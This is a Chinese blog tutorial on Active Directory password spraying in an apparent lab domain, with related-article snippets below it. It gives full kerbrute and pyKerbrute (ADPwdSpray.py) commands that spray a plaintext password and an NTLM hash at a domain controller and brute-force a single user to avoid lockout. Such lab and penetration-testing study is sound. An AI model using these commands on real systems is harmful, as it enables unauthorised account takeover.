域渗透-域内密码喷洒

最新推荐文章于 2025-04-16 18:14:22 发布
最新推荐文章于 2025-04-16 18:14:22 发布
阅读量419 收藏 2
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 从入门到入狱 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/144402962

域内密码喷洒

密码喷洒配合用户枚举使用,先进行枚举再进行喷洒

为什么不爆破,而是喷洒:

规避账户锁定策略

学习怎么设置密码锁定策略:

在工具找到组策略管理,在域下的Default Domain右键点击编辑

在这里插入图片描述
在这里插入图片描述

在计算机配置=>Windows设置=>安全设置=>账户策略=>账户锁定策略 下可以设置账户锁定的阈值

同时在密码策略也可以修改密码复杂度等

在这里插入图片描述

查看锁定阈值:

可以用命令查看

net accounts /domain

在这里插入图片描述

密码喷洒:

./kerbrute_linux_386 passwordspray --dc 192.168.10.3 -d oscp.com user.txt ty@123456

在这里插入图片描述

若不存在密码锁定策略可针对单个用户进行爆破

./kerbrute_linux_386 bruteuser --dc 192.168.10.3 -d oscp.com pass.txt ty

在这里插入图片描述

相比kerbrute工具pyKerbrute除了可以使用明文密码,还可以使用hash进行喷洒

直接使用报错ImportError: No module named Crypto.Cipher,尝试了很多办法,kali自带的是2.7版本的python,各种报错用_crypto下的hashlib还不支持MD4,最后终于找到办法

首先在我的kali上没有pip2,先进行安装

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python2 get-pip.py

然后需要安装库

pip2 install pycryptodome

#如果遇到什么报错,可能需要安装下这个
pip2 install setuptools

之后改代码,将Crypto.Cipher改为Crypto.Hash,完成后可以成功运行

在这里插入图片描述

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt clearpassword ty@123456 tcp
python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt clearpassword ty@123456 udp

在这里插入图片描述

执着的安装这个pyKerbrute,就是因为他可以用hash进行喷洒

ty@123456的NTLMHash:9f2e2c0fc137d6bdb96526d605a804b2

在这里插入图片描述

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt ntlmhash 9f2e2c0fc137d6bdb96526d605a804b2 tcp

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt ntlmhash 9f2e2c0fc137d6bdb96526d605a804b2 udp

在这里插入图片描述

域渗透—域用户枚举与口令爆破
渗透之路,攻防之间皆学问
03-24 4851
Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击。
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 706
正常域用户登录主机,我们可以通过 "net user /domain"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 "net user /domain"这条命令的。或者当主机不在域内但是能与域控通信时,以上两种情况我们可以通过以下方法对域内用户进行枚举。
域AD渗透手法【密码喷洒技术】
最新发布
lza20001103的博客
04-16 1355
域AD渗透手法【密码喷洒技术】
域内密码喷洒详解
yswy_的博客
12-20 798
域内密码喷洒(Passwoerd Spraying)一般和域内用户名枚举一起使用。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名。当用户名存在时,在密码正确和密码错误两种情况下,AS-REP的返回包不一样。所以可以利用这一点对域内用户名进行密码喷洒攻击。用户爆破密码多次尝试会账户锁定,所以这里是密码固定用户不固定进行密码喷洒
内网渗透下的密码喷洒
LiBai'S BLOG
09-27 6627
1、密码本来源途径(信息泄露、翻配置文件、翻回收站、桌面账号密码本、mimikatz抓到的)2、喷洒的时候工具尽量放到内网机器上面,本地使用工具的线程过高流量过大会导致隧道崩掉3、喷洒时可以针对一个C段进行,这样能爆出来的机器会有很多4、内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波…,如此反复。
内网安全之域内密码喷洒
weixin_45910629的博客
04-06 1310
域内密码喷洒一般和域内用户名枚举一起使用,可以在无域内凭据的情况下,通过枚举出域内存在的用户名,进而对域内存在的用户名进行密码喷洒,以此来获得域内有效凭据。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标域设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。
域渗透密码喷洒攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 2056
在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。
从域外对域内进行信息收集、密码喷洒
渗透之路,攻防之间皆学问
06-06 2063
LDAP(Lightweight Directory Access Protocol),轻量⽬录访问协议,是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 域服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来访问 AD 内的对象,默认端⼝ 389。域外用户枚举、密码喷洒...
域渗透-kerberos协议 学习篇(1)
weixin_44747030的博客
04-17 1046
AS_REQ&AS_REP 0x00 前言 域渗透的本质就是协议,在最近的学习中发现自己对域渗透kerberos协议这块有点模糊了,所以又回头看了一下,这次顺便记录下来,加深印象。 我会把域渗透中常见关于kerberos协议利用的方法和自己的理解都写清楚。方便自己下次看,欢迎小伙伴一起学习。 这篇文章会先写kerberos的前2个阶段,也就是AS_REQ和AS_REP,会将自己的理解和这个阶段常见的攻击手法都写下来。 kerberos 认证流程 kerberos认证过程中会涉及到以下几个角色: 1、
域渗透完全技巧.pdf
10-03
在没有密码的情况下,可能会使用密码喷洒或ASREP Roasting攻击来获取哈希值。 5. **权限维持**:一旦获取了域控权限,攻击者会部署后门,如利用域信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还...
域内用户名枚举和密码喷洒
tomyyyyy
08-27 496
域内用户名枚举和密码喷洒 于Kerberos本身是一种基于身份认证的协议,所以也可对进行暴力破解或用户名枚举,并且不需要域用户下,只要攻击者所控的机器可以与域控的KDC正常通信即可(可以ping通) 实验 我这里实验主要是域控administrator、域成员af、还有一台非域机。 nmap -p 88 --script krb5-enum-users --script-args krb5-en...
[内网渗透]—域外向域内信息收集、密码喷洒
Sentiment的博客
12-16 1962
当我们与目标内网建立了socks5隧道后,就可以从域外对域内机器进行信息搜集了,很多工具不用上传到目标机器,也就不易被AV检测到,但是有可能会被一些流量检测设备发现有大量socks5流量。接下来介绍下如何通过域外对域内进⾏更深的信息搜集:枚举域⽤户、查看域内⽤户、查看域内组、查看域内机器列表…LDAP(轻量⽬录访问协议),是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 域服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来
渗透测试之 域AD渗透手法【密码喷洒技术】手法详解 以及相关示例(2025/3/9)
热门推荐
浩策盾悟
10-10 1万+
域内用户名枚举是通过发送大量的AS-REQ包,根据返回的包内容筛选出存在的域用户,可以通过以下两方面进行检测。日志记录还和通讯KDC有关,如果域中存在多个域,则不同域控上记录的日志不相同,并不是每个KDC上都会有日志。因为默认情况下该脚本是利用LDAP从域中到处用户列表,然后去除被锁定的用户,在用指定的密码进行喷洒。普通的爆破就是用户名固定来爆破密码,但是密码喷洒是用固定的密码去爆破用户名。存在的用户名字典文件,也就是通过域内用户名枚举攻击枚举出的有效用户。请求包cname 对应的值是用户名,
内网渗透_密码喷洒攻击
qq_42383069的博客
03-28 9430
密码喷洒攻击 0x01. 背景 ⼀般我们我们与目标内网建立了 socks5 隧道后,就可以从域外(这⾥指的是我们攻击的机器)对域内机器进行密码喷洒了,前提是已经通过信息搜集或者抓密码得到了⼀批密码,我们就可以通过得到的密码来对域内进行密码喷洒 0x02. 工具与方法 1. CrackMapExec 对域内进行密码喷洒 CrackMapExec(⼜名 CME)是⼀款非常好用的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。 1.2. 下载地址:https://github.com/byt3bl3
域渗透 | 用户枚举与密码喷洒
m0_57221101的博客
04-14 1389
必看!工具缺陷 berbrute工具当使用密码喷洒功能的时候会导致一个问题,密码参数作为独立一个参数会被密码本身存在的特殊字符中断,比如#,$,@一类的东西。 解决方案是先用用户枚举看到用户都有什么之后,用密码爆破把想要喷洒密码放在文本文件中,就可以实现 用户枚举(UserEnum) 原理 在AS_REQ过程中传递的用户信息在AD中存在与否,AS给返回的状态信息不一致,存在的用户还会额外返回e-data数据 三种状态码 KRB5DC_ERR_PREAUTH_REQUIRED需要额外的预
域内攻击手法——域内用户枚举和密码喷洒
Naive的博客
06-21 2211
域内用户枚举可以在无域内有效凭据的情况下,枚举出域内存在的用户名,并对其进行密码喷洒攻击,以此获得域内的有效凭据。
域渗透-用户枚举和密码喷洒
weixin_43227251的博客
05-06 1619
域渗透-用户枚举和密码喷洒 在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击 域内用户枚举 当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。 我们可以使用Kerbrute工具进行探测。 工具地址:https://github.com/ropnop/kerbrute kerbrute_windows_amd64.exe
什么是密码喷洒攻击
weixin_40191861的博客
04-04 554
密码喷洒攻击针对许多不同的账户、服务和组织尝试使用一个或两个通用密码,以此避免在单个账户上被检测或锁定。攻击者使用这种方法避免超过设定的账户锁定阈值,许多组织经常设置为输错三到五次就锁住账户。只要在锁定阈值内输对密码,攻击者可以在整个组织成功尝试多个密码,不会被活动目录中的默认保护机制阻止。攻击者选择最终用户常用的密码和数学公式来猜测密码,或使用已在密码泄露网站上公布的泄露密码。用户在设置密码时要求用户使用特殊字符和字母数字组合,并限制最小长度。使用随机数时,要确保用户无法获取随机数生成算法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值